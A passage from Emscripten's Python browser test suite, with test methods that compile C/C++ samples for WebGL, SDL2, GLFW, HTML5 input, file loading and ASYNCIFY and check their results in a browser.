# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(path_from_root('tests', 'browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(path_from_root('tests', 'html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest(path_from_root('tests', 'test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(path_from_root('tests', 'third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', path_from_root('tests', 'sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(path_from_root('tests', 'sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
